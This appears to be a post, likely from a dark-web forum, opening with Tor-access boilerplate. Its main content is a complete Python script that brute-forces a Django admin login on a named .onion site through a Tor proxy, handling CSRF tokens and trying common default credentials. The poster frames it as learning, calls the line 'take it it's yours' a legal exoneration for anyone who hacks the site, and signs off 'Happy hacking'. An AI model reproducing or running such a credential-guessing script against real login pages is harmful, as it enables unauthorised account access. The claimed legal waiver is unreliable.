To view the list of links, please access this site using Tor Browser.
If you’re seeing this message, access is restricted for regular browsers.
Already using Tor? If you are sure you’re currently in Tor Browser, proceed to our .onion version:
import requests
from bs4 import BeautifulSoup
login_url = "http://vanitydadboumuk5rzr4rwmrerikgmmkplytdcz4shscqg6rwlwgtcqd.onion/admin/login/?next=/admin/"
session = requests.Session()
session.proxies = {
'http': 'socks5h://127.0.0.1:9050',
'https': 'socks5h://127.0.0.1:9050',
}
session.headers.update({
'User-Agent': 'Mozilla/5.0',
})
def try_login(username, password):
resp = session.get(login_url)
soup = BeautifulSoup(resp.text, "html.parser")
csrf_token = soup.find("input", {"name": "csrfmiddlewaretoken"})["value"]
cookie_token = session.cookies.get("csrftoken")
payload = {
"csrfmiddlewaretoken": csrf_token,
"username": username,
"password": password,
"next": "/admin/",
}
headers = {
"Referer": login_url,
"Cookie": f"csrftoken={cookie_token}",
}
r = session.post(login_url, data=payload, headers=headers, allow_redirects=True)
print(f"Trying {username}:{password} => {r.status_code}")
return "Error:" not in r.text
for user in ["admin", "root", "test"]:
for pwd in ["admin", "password", "123456", "test", "toor"]:
if try_login(user, pwd):
print(f"[+] Success: {user}:{pwd}")
exit()
see full script above it's about learning, not flooding.
As for the "take it it's yours" is my way of legally exonerating anyone that hacks my site.
Happy hacking my friends.